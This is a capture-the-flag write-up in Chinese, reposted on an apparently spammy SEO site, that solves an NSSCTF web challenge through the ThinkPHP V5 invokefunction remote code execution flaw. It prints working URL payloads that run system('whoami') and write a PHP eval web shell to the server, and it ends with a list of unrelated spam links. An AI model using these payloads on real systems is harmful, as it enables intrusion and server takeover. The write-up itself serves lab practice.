当前位置: 首页 > news >正文

电子商务网站管理的基本内容seo短期课程

电子商务网站管理的基本内容,seo短期课程,网站做可信认证多少钱,手机便宜的网站建设打开题目就在线环境,发现只有一句话:真的什么都没有吗 F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到: 然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到: …

打开题目就在线环境,发现只有一句话:真的什么都没有吗
F12查看控制台和源代码也没发现任何信息,然后用虚拟机里面的dirsearch扫一下这个网站就能得到:
在这里插入图片描述
然后这里扫出来的结果查看的直接就是robots.txt,然后就能看到:
在这里插入图片描述
然后访问:/NSS/index.php/
在这里插入图片描述
这里直接搜索ThingkPHP V5就能得到这个漏洞复现的方法,我就是根据搜索到的帖子的漏洞复现方法跟着做的。

payload:?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

在这里插入图片描述

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php phpinfo(); ?>(将php代码写入shell.php)

在这里插入图片描述
再访问/NSS/shell.php
在这里插入图片描述
然后再
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[1]);?>(删除/shell.php替换)

在这里插入图片描述
最后蚁剑连接,网址:http://node5.anna.nssctf.cn:22775/NSS/shell.php
密码为1
最后flag的路径为:/nss/ctf/flag
在这里插入图片描述

http://www.yidumall.com/news/82421.html

相关文章:

  • wordpress安装到服务器湖南关键词优化推荐
  • 天博网站建设今日新闻头条最新消息
  • 国内做化妆刷的比较好的网站国际新闻最新消息今天 新闻
  • wordpress4.9中文主题专业搜索引擎seo合作
  • 江苏建设监理网站石家庄seo报价
  • 网站建设实验周志与总结2022近期时事热点素材
  • 做网站 怎么连到数据库seo沈阳
  • 北京网页设计哪家好石家庄seo外包公司
  • 校园微网站界面注册一个域名需要多少钱
  • 电子商务网站建设汇报PPT关键词搜索指数
  • 想注册自己的品牌怎么注册巩义网站优化公司
  • 浦江做网站杭州seo技术
  • 网站开发职责与要求免费制作网站
  • 网站建设的推广渠道线下广告投放渠道都有哪些
  • wordpress奖励插件网站优化课程
  • 肇庆网站制作软件游戏推广员好做吗
  • 惠州百度seo哪里强seo流量软件
  • 怎样做企业网站建设hao123上网从这里开始官方
  • 为什么自己做的网站打开是乱码网站有哪些平台
  • 郑州php网站开发培训凡科建站官网
  • 定州做网站全球搜索网站排名
  • 北京市保障房建设官方网站山西seo排名厂家
  • 龙岗微网站建设竞价托管收费标准
  • wordpress 2.8seo网站推广计划
  • 网站简单设计福州网站开发公司
  • 目录做排名 网站网站快速上排名方法
  • 网站后台编辑器不显示软文代写兼职
  • 专业做网站推广的公司东莞产品网络推广
  • 免费的正能量视频素材网站最新域名ip地址
  • 中国建设银行官网站e路护下载关键词上首页软件